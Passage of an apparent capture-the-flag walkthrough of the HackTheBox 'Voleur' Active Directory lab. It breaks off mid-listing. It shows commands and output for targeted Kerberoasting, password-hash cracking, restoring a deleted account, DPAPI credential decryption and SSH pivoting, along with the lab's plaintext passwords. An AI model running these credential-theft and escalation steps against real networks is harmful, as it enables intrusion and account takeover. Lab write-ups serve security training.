Breach Scenario
1
2
| As is common in real life Windows pentests, you will start the Voleur box with credentials for the following account:
ryan.naylor / HollowOct31Nyt
|
Recon
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| sudo nmap -PN -sC -sV -oN voleur 10.10.11.76
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 14:47 PKT
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.60% done; ETC: 14:49 (0:02:03 remaining)
Nmap scan report for 10.10.11.76
Host is up (0.11s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-09 17:24:44Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-07-09T17:24:59
|_ start_date: N/A
|_clock-skew: 7h37m18s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.78 seconds
|
It’s better to ntpdate with the server to handle clock skew.
/etc/hosts
1
| 10.10.11.76 DC.voleur.htb voleur.htb
|
At the same time it’s a good idea to setup your KRB5CONF.
SMB
user:pass auth isn’t supported on SMB. We will start by getting a TGT.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| sudo apt install krb5-user
kinit ryan.naylor@VOLEUR.HTB
Password for ryan.naylor@VOLEUR.HTB:
klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: ryan.naylor@VOLEUR.HTB
Valid starting Expires Service principal
07/09/2025 23:23:44 07/10/2025 09:23:44 krbtgt/VOLEUR.HTB@VOLEUR.HTB
renew until 07/10/2025 23:23:38
┌──(kali㉿vm-kali)-[~/htb/voleur]
└─$ export KRB5CCNAME=/tmp/krb5cc_1000
impacket-smbclient -k -no-pass voleur.htb/ryan.naylor@dc.voleur.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# help
|
Shares
1
2
3
4
5
6
7
8
9
| # shares
ADMIN$
C$
Finance
HR
IPC$
IT
NETLOGON
SYSVOL
|
IT, HR, Finance are interesting shares. We will enumerate them.
1
2
3
4
5
6
7
8
9
10
11
| # use IT
# ls
drw-rw-rw- 0 Wed Jan 29 14:10:01 2025 .
drw-rw-rw- 0 Wed Jul 9 18:30:58 2025 ..
drw-rw-rw- 0 Wed Jan 29 14:40:17 2025 First-Line Support
# cd First-Line Support
# ls
drw-rw-rw- 0 Wed Jan 29 14:40:17 2025 .
drw-rw-rw- 0 Wed Jan 29 14:10:01 2025 ..
-rw-rw-rw- 16896 Fri May 30 03:23:36 2025 Access_Review.xlsx
# get Access_Review.xlsx
|
On opening the excel sheet we are presented with a password.
JohnTheRipper
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| /usr/bin/office2john Access_Review.xlsx
Access_Review.xlsx:$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c
└─$ cat excel.hash
$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c
┌──(kali㉿vm-kali)-[~/htb/voleur]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt excel.hash --format=office
Warning: invalid UTF-8 seen reading /usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 128/128 SSE2 4x / SHA512 128/128 SSE2 2x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 3 OpenMP threads
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
football1 (?)
1g 0:00:00:17 DONE (2025-07-09 23:48) 0.05810g/s 119.2p/s 119.2c/s 119.2C/s google..emmanuel
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
|
football1 for excel sheet.
svc_ldap:M1XyC9pW7qT5Vn svc_iis:N5pXyW1VqM7CZ8
To winrm we will requrire lacey account.
Bloodhound
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| sudo neo4j console
bloodhound
bloodhound-python --dns-tcp -ns 10.10.11.76 -d voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: voleur.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 12 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.voleur.htb
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.76:445)] timed out
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.76:445)] timed out
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.76:445)] timed out
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.76:445)] timed out
INFO: Done in 01M 43S
|
WriteSPN
svc_ldap has WriteSPN over svc_winrm. It can be abused using targetedKerberoast. It also is a member of Restore_Users which has GenericWrite over lacey.miller. We can also abuse it with targetedKerberost or pywhisker.
Let’s grab the tool.
TargetedKerberoast
Credentials won’t suffice. Kerberos ticket is required, we will get TGT.
1
2
3
4
5
6
7
8
| impacket-getTGT voleur.htb/svc_ldap:M1XyC9pW7qT5Vn -k
/home/kali/htb/voleur/targetedKerberoast/.venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in svc_ldap.ccache
export KRB5CCNAME=svc_ldap.ccache
|
1
2
3
4
5
6
| git clone https://github.com/ShutdownRepo/targetedKerberoast.git
python3 -m venv .venv
┌──(kali㉿vm-kali)-[~/htb/voleur/targetedKerberoast]
└─$ source .venv/bin/activate
|
Before using the script we must make some changes:
1
2
3
4
5
6
7
8
9
10
11
12
13
| def get_machine_name(dc_ip, domain):
if dc_ip is not None:
s = SMBConnection(dc_ip, dc_ip)
else:
s = SMBConnection(domain, domain)
try:
s.login('', '')
except Exception:
if s.getServerName() == '':
raise Exception('Error while anonymous logging into %s' % domain)
else:
s.logoff()
return s.getServerName()
|
Since our Machine isn’t really allowing SMB connection this way, we will just return the name directly:
1
2
| def get_machine_name(dc_ip, domain):
return 'dc.voleur.htb'
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| └─$ KRB5CCNAME=svc_ldap.ccache python3 targetedKerberoast.py -v -d 'voleur.htb' -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (lacey.miller)
[+] Printing hash for (lacey.miller)
$krb5tgs$23$*lacey.miller$VOLEUR.HTB$voleur.htb/lacey.miller*$253f25286b2b6cc2b9a627dc0d40fd1a$bb526624e78581fca246bdbcc5555a6099b42281c257d75a5b16dec4e2cdeaeb9fdbcfb03dd420e086a08f2bb22de5a94a3a11e8b7eb7357c2f28c597700b575557837a68383dccdf13713545cd7ee082b1c546810f280dc0054ae8968bb0ae1e995c3487218d9a09b1b12e7117a95f7c45fcb500ec39ba6ebaa5e6243f8a041ab74a761a4243addbed005959d099d7d5f8db347832f20ebdd2cf8aa0747c7150ed5f390c6ac8ec80b2da3ffe87d6aace28e10520eb13b1efac32a7333f47ff7ba31a57d12c1c1d265c535d62e88df120dea75ad7c7111dd7b4639d0b60828d30cae0c4fa9e749a0ba2f50e780234557cfd447e620afff583e835ba9f7ca22b9bbf0384f7e1cc26651ac7d324ce942713c4af38184f3256feb55d8eb03d7a66c5ad803a2ec5a8aa22fbb71150247cf63e2b3e76ba40aaeddd2af43623eddf0a158d307bfdd303af651fceda2427bc94fd58b1ad3a308d973046affe3e2248e2d7c982e1e1a9e331bdb637f498e53787974a16f3eae70f82428eb36bc5ff3fd4b79cc6bf99dd6aa00ab59ae29d626d0c94912ed301d0977ca3eb86d5ae2fecc4ee192f5de40f503f481cf417c9b05e452f199f21db17aff9dc2091849589952cf35a5d8ab5f268c88c5334b74c42233d13e9e94b7a213b58f42566bd22c425526f6c29d7b33027853137a8e1e6314b2836145e5b35e5f43c8235f6ac8747733ee7fad2a78a799b10c291ac9118a226ce8d36965ac15455e65f7eedea274c6a08929abc1c90910261d405c98879b51101ccd65a1059cc422908b93782574900051f0ffc4e85581ed3e5208ab44266a202437fa767ccdb6787bcbce57191ded5e15e7a6517f4728330239262cc937b31775727ae102eb40fc48778bc730326faf669365cb4ad3a4ac151db0efad3c233a087890409d64bdfa9cbcc7e4cd5c03e056c9d945807b7376221c4bd07575062b8a72e26cf40a10c251333c50fa5746cb99d820c1f76e228d1a2ba81b1f664c881c03b738c7bb2483bcea9b255e3cc47157c6ac388ac216d37c2f88cab6d76ae285c294abcd069fac59a7e82ceafee2cd72d73b31f3a628e8ed1f3c1f15fece3deb95b6b4a8f91e52d9491217eefd3dde7d982ff2c0fb9820d8537ef22d50017d45b0d989fea6e66bc2e403e2b66210c0d1bc4107d076e237006035fd135b86d0e6bf0e529b2e91aa2c5f6bc08f2a3801d0fb95bb4e7c33551bdd21a738f7656498eb0448465107240b2c50b0b7dd642748895b39f89b13f879368445a823fc59aee27a4511a95ba2db57e6b2dcdb83f1a8e02498ad85baf947da346f716b1baa025837c7d0afb455461dcc93cdcc928a70692ff865d02bf7aa7c6b08905dd115d056fc472d2d7cecaff93fcfcf13338f04c976a436f3b7530edef39d2e2fdb1809bf6509f652f474c0a02ddd43ba0812d9046e3e36b1cc11852e65efc0c2759c7a59d141
[VERBOSE] SPN removed successfully for (lacey.miller)
[VERBOSE] SPN added successfully for (todd.wolfe)
[+] Printing hash for (todd.wolfe)
$krb5tgs$23$*todd.wolfe$VOLEUR.HTB$voleur.htb/todd.wolfe*$d6788068634162afad99e0ee16ffa151$3a22b2cc275fc3c3d50314decf555f9140889cb51bff1d98611ed4d743aabcb2459ee3e9126c3bc5138810913bfbe24a991e50b7d33c7d476cfc56029f9d0e2ce27f54e37d801d86fda0d297ee245b81b9ba6957cf2275a42cdb30f17caa6eaf494cd4760faefffc5f02e794f1d130cbed9c9ae649641577d319b3ddb55f4915c1575c0487869ae6461a157ead9581352fe746765c5e5645eb6006d72bc32aa52c244507fb6a0103ccd7d628955184ec87515bca6f34d1c9785d10ce957dc01d158b42288f16b738b31ee6ea08816e47b1145fb335b11317c55a5dbc6045832ad2b20f2b709558f86aaa7bec61ca16ab496917aba005d88240dd60b0c1299e8b6a8c5289945fb676dac3e4c40c5a1e4f594665b2adcc7daa45971928230ebfbca912f2bd31549ee75291b1cd5cfb994fdb3b0993639eb113ecccd7c45635d936c9d61df17d6abd7babfdccb154d401fa695a7e29aa6d63590cddf906cf139f2f4d92444593f5588dba1acae5023c6548e720ae40a5d73366e587e5c241004c82df31c90cd4540df199a981fbe3c528eeadeb0230d3fd952c9ced8ea75e8503ed0a4478fbfe61fed18138eb8e3b91043abac59d554f111f7b97762012f33fe27f1aecc981aabfab4c71b5f2735c880fb7bfd2065959dd5f0018e13caf8b072d54b374e0da3425471e45c531a5ecada4c3d41a27c3982c7967a48170d439d02dd8a6fe0ceb415cfb9e414ad7e87892481de1a9834eb6d9c8b625b16f210bf1b53865eab95d091e113c1fc61778ed04cb19d6f1adf181bc429c52efe667df06f26e9548bd3f1b24646429b8935d002c6be2cd22dfed5aa1baf0bfda148098b3e4a7136ad64b31e9ca564d07b9407f67cf573dff3fc0a3815b0795576f479b5c8de0830bacedb7f86fd247e4ae53729b862b75f1dcf9e9e5fa14266c70b417c0a5a8be25497fb71fbdb84acc1bf3ca0a5dba03ae0ab0930fff78d3aa77fa0f86f6e845039906cbb8fbb79ba89dfbfb4d3b11b7a8fc85e0140bd08c5d59c7f0392ba1f7f2b160819c848479199c0791e33c679346e43b15a395cf863f629875e78e62e2a71d04a805b8a336cc12d64a4f0d14bcb46be2c56dfc98c031701276c8538306d069dfa2d1a560bf160f593a3f4d25d211a190963dfae7f4b2195aa3a000b1aab858b49b588e80ca3645e8746ed826da7827fb0f381fd7b6c73b84ddf0913d24ef48dd9a17b162b046841d3fcf79125fb834252cb365f2eda48e3d5cddf919a18cdb81b84d7c8a4207d41a986388014c182a61b44b3a70a06c4a00a9a0ff14e58897ae16ee1a3d8b3dc63f968a56b158771693b1f4324834a69284f38b8d57b75c166ca6223cee931bb53fd62413f9082af65c737d37085cea71989b86c6e2efd924e509336ee0e80be42b45bbb0e25de773553210b8069c83b4c637d2692541922493bced13a832013979e9d18998b63653
[VERBOSE] SPN removed successfully for (todd.wolfe)
[VERBOSE] SPN added successfully for (svc_winrm)
[+] Printing hash for (svc_winrm)
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$53b684f58ae66d59931dac78f7b5dc78$69c7f335ba353e4d99cda919cbbbe4f4bd293c9d756fafa69fa7db6839b9350a7bc466ba958aba96ed3f44db1b720250172d07625e050210c0e95200f31802de93f361476f4ace84d3bebbe172dae02083d5a1aeaa08bc3853f89812baac4653ac3f992afe4883a59ba115d616aa1caa8262d0c0685a00a1a1cfd408affacb0deb75608a1feb77e32f6c4a848a1af6bd3603cf183c2fe76e964c1207daeb346b9ac5c3989507676f783d924ab74e454e3ff9e590aad1c354eee6fc8875fe1d2e10953d174d9d3edacaa6abbb4520b441621861d84f83afd2578e287eb1c24f7d9d991c2e44d42293384b3ad750e36db050b913dd9707f69e1a3392366770979eeab2d9336ba6d502c6b833dbaf689de78f7297fdea76a235bab6c0f997e75f86e402aa59a39e18520ff6b33784aaed984110dbb875dd29c4b2d9348b2301d1b29f91ed8b5d5f4eb90cd953a0c6a9466a62eba766c03342b81518d691c32dd5e30e85cad33d9d4ac917e67db022f4df51c83cb296795de09bad1cdd41b321b0031dc97120dbb584fd5e3ae4a0bf2500d6aaa121cd97b2837c5156b7a704452f8fd3b945cf7f911a30b409d6df4e59ab5f9aea804b16e6d0480e89cfe2485290668c5e6d947b08f7d253112e261da5eec74c74fa12b632f2e9f9262041d41d09f99d3fab8bea2ec7f11ca44fdb53e0a70bfed652f458f5f45fae9efb97af5deab2ec75e299048902fa14faf89b71ef0fa4fafcff0c951d3dc3e2211bb2c0932af052b7feb6efbea3a841ffc3f8ac8312a2930cc61e3769ef9345ce8ddcfb5bc057fe1ad2d6994e0ef39933ebaf9550ce3f50272d609125ce3f48250818c75248c399e0738c6065b1032e7f766689f66b25fb1e2b4b051b89f1d01c9fb52d9231ed8de6e5ce5f28ef0dc2d6a5b2ec591b09a2006df56bc35b63cc33e6f97805453747e763b124f17821ae8a8442a9641ab9baa08d1705dee24e53d430dbe5d8fa3b0dbb7463da852ddd6fbc5d18e9eec39188bb5cfaab14dbc95227df4232aea6a634a2d0264f3237c32d6c2dbb76015e4cd7b2bea8c0f34afde3e0ac8a7a1849c6ef3ab2fb3ba4a0b276f639eb0463d1775f8c6cc968bff7ed608293b7f646ebef50157797ea73628e134e22fb14539740e733346fcfcaa81f4879e72baec112decbdcae966f8b2ac35b4002822dd27a3b7fb80f2243e514b44e32af9cb3d6b8d9457abae5b95288dae49d86eaf7a60cd636050d86757bbc5ab438854cd42dfa2d6bd9da6edcfc54d468c85da76fe92560a5f9e986fc81ae382a45d81e15b83d9c0317f55f064ad6b21a63dcf4a05811f06a1898a2d905461246b9f1a11156f436d8ec2272f4b1b869eb56b5ef20db1d7ab2af62ce28f304297a3cfe51685214a386bc52e8d7419fc2a7ecff8bde2b1e7541b8011938644586fa2e9505a5e38125ed121d909c0b503b99627adc25c00b5ff0285e
[VERBOSE] SPN removed successfully for (svc_winrm)
|
Let’s crack the hashes.
JohnTheRipper again
1
2
3
4
5
| john --list=formats | grep krb5
414 formatskeyring, keystore, known_hosts, krb4, krb5, krb5asrep, krb5pa-sha1, krb5tgs,
(149 dynamic formats shown as just "dynamic_n" here)
krb5-17, krb5-18, krb5-3, kwallet, lp, lpcli, leet, lotus5, lotus85, LUKS,
mscash2, MSCHAPv2, mschapv2-naive, krb5pa-md5, mssql, mssql05, mssql12,
|
svc_winrm
1
2
3
4
5
6
7
8
9
| john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt svc_winrm.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
AFireInsidedeOzarctica980219afi (?)
1g 0:00:00:05 DONE (2025-07-10 00:41) 0.1886g/s 2164Kp/s 2164Kc/s 2164KC/s AG156228..AEGIES
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
|
svc_winrm: AFireInsidedeOzarctica980219afi
evil-winrm as svc_winrm
1
2
3
4
5
6
7
8
9
10
| impacket-getTGT voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in svc_winrm.ccache
┌──(kali㉿vm-kali)-[~/htb/voleur]
└─$ export KRB5CCNAME=svc_winrm.ccache
┌──(kali㉿vm-kali)-[~/htb/voleur]
└─$ KRB5CCNAME=svc_winrm.ccache evil-winrm -i dc.voleur.htb -u svc_winrm -r voleur.htb
|
Privilege Escalation
Now that we have user flag we can move onto priv escalation. svc_ldap has GenericWrite over lacey.miller, but it doesn’t seem like it leads to much. What’s interesting is:
1
2
3
4
5
6
7
8
9
10
| *Evil-WinRM* PS C:\Users\svc_winrm\Desktop> dir
Directory: C:\Users\svc_winrm\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/29/2025 7:07 AM 2312 Microsoft Edge.lnk
-ar--- 7/9/2025 12:23 PM 34 user.txt
|
The existence of Microsoft Edge. But the current user doesn’t really have any Edge credentials.
Restoring Todd
We weren’t able to crack lacey hash. But we already have todd’s password.
1
2
| KRB5CCNAME=../svc_ldap.ccache python3 bloodyAD.py --host dc.voleur.htb --dc-ip 10.10.11.76 -k set restore todd.wolfe
[+] todd.wolfe has been restored successfully under CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb
|
todd.wolfe:NightT1meP1dg3on14
Get his TGT as well:
1
2
3
4
| impacket-getTGT voleur.htb/todd.wolfe:NightT1meP1dg3on14 -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in todd.wolfe.ccache
|
SMB as Todd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| RB5CCNAME=todd.wolfe.ccache impacket-smbclient -k -no-pass voleur.htb/todd.wolfe@dc.voleur.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
ADMIN$
C$
Finance
HR
IPC$
IT
NETLOGON
SYSVOL
# use IT
# ls
drw-rw-rw- 0 Wed Jan 29 14:10:01 2025 .
drw-rw-rw- 0 Tue Jul 1 02:08:33 2025 ..
drw-rw-rw- 0 Wed Jan 29 20:13:03 2025 Second-Line Support
#
|
Some interesting directories on doing tree:
1
2
3
4
5
6
7
8
9
10
| /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Crypto
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Internet Explorer
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Network
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Spelling
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/SystemCertificates
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Vault
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Windows
/Second-Line Support/Archived Users/todd.wolfe/AppData/Local/Microsoft/Credentials/DFBE70A7E5CC19A398EBF1B96859CE5D
|
1
2
3
4
5
6
7
8
| /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Crypto/Keys
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Crypto/RSA
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Internet Explorer/UserData
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Network/Connections
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/CREDHIST
/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110
|
dpapi
Masterkey
I went throught the previously collected user SID and can confirm the one we found S-1-5-21-3927696377-1337352550-2781715495-1110 is todd’s. A blob parsing tool (dpapi) is required to crack the MasterKey (/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88) we found.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
|
Credentials
Now using this masterkey we can crack the credentials that we found under /Microsoft/Credentials/.
1
2
3
4
5
6
7
8
9
10
11
12
13
| impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19+00:00
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m
|
jeremy.combs:qT3V9pLXyN7W4m
SMB as jeremy
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| impacket-getTGT voleur.htb/jeremy.combs:qT3V9pLXyN7W4m -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in jeremy.combs.ccache
┌──(kali㉿vm-kali)-[~/htb/voleur]
└─$ export KRB5CCNAME=jeremy.combs.ccache
┌──(kali㉿vm-kali)-[~/htb/voleur]
└─$ impacket-smbclient -k -no-pass voleur.htb/jeremy.combs@dc.voleur.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
ADMIN$
C$
Finance
HR
IPC$
IT
NETLOGON
SYSVOL
# use IT
# ls
drw-rw-rw- 0 Wed Jan 29 14:10:01 2025 .
drw-rw-rw- 0 Thu Jul 10 06:28:26 2025 ..
drw-rw-rw- 0 Thu Jan 30 21:11:29 2025 Third-Line Support
# cd Third-Line Support
# ls
drw-rw-rw- 0 Thu Jan 30 21:11:29 2025 .
drw-rw-rw- 0 Wed Jan 29 14:10:01 2025 ..
-rw-rw-rw- 2602 Thu Jan 30 21:11:29 2025 id_rsa
-rw-rw-rw- 186 Thu Jan 30 21:07:35 2025 Note.txt.txt
|
Well I see an SSH key. The system also had port 2222 exposed. We might potentially be able to get SSH? Let’s get both files.
Notes.txt.txt
1
2
3
4
5
6
7
8
9
10
| cat Note.txt.txt
Jeremy,
I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
Admin
|
Looking at bloodhound results, there was a svc_backup account as well. The ssh key will probably be for that account.
ssh as svc_backup
1
2
3
4
| chmod 600 id_rsa
┌──(kali㉿vm-kali)-[~/htb/voleur]
└─$ ssh -i id_rsa svc_backup@10.10.11.76 -p 2222
|
Well I made a blunder ls -laR /, but it lead me to discover that we have a mounted volume!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| svc_backup@DC:/mnt/c$ ls -la
ls: cannot access 'DumpStack.log.tmp': Permission denied
ls: cannot access 'pagefile.sys': Permission denied
ls: PerfLogs: Permission denied
ls: 'System Volume Information': Permission denied
total 0
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:39 '$Recycle.Bin'
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jun 30 14:08 '$WinREAgent'
drwxrwxrwx 1 svc_backup svc_backup 4096 Jul 9 18:28 .
drwxr-xr-x 1 root root 4096 Jan 30 03:46 ..
lrwxrwxrwx 1 svc_backup svc_backup 12 Jan 28 20:34 'Documents and Settings' -> /mnt/c/Users
-????????? ? ? ? ? ? DumpStack.log.tmp
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 29 01:10 Finance
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 29 01:10 HR
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 29 01:10 IT
d--x--x--x 1 svc_backup svc_backup 4096 May 8 2021 PerfLogs
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 06:20 'Program Files'
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 05:53 'Program Files (x86)'
drwxrwxrwx 1 svc_backup svc_backup 4096 Jun 4 15:34 ProgramData
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 28 20:34 Recovery
d--x--x--x 1 svc_backup svc_backup 4096 Jan 30 03:49 'System Volume Information'
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 03:38 Users
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jun 5 12:53 Windows
dr-xr-xr-x 1 svc_backup svc_backup 4096 May 29 15:07 inetpub
-????????? ? ? ? ? ? pagefile.sys
drwxrwxrwx 1 svc_backup svc_backup 4096 Jul 9 18:28 tools
|
Seems like jeremy didn’t have access to everything on the smb share:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| svc_backup@DC:/mnt/c$ ls -la IT/Third-Line\ Support/
total 4
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 08:11 .
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 29 01:10 ..
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 08:11 Backups
-r-xr-xr-x 1 svc_backup svc_backup 186 Jan 30 08:07 Note.txt.txt
-r-xr-xr-x 1 svc_backup svc_backup 2602 Jan 30 08:10 id_rsa
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups$ ls -la
total 0
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 08:11 .
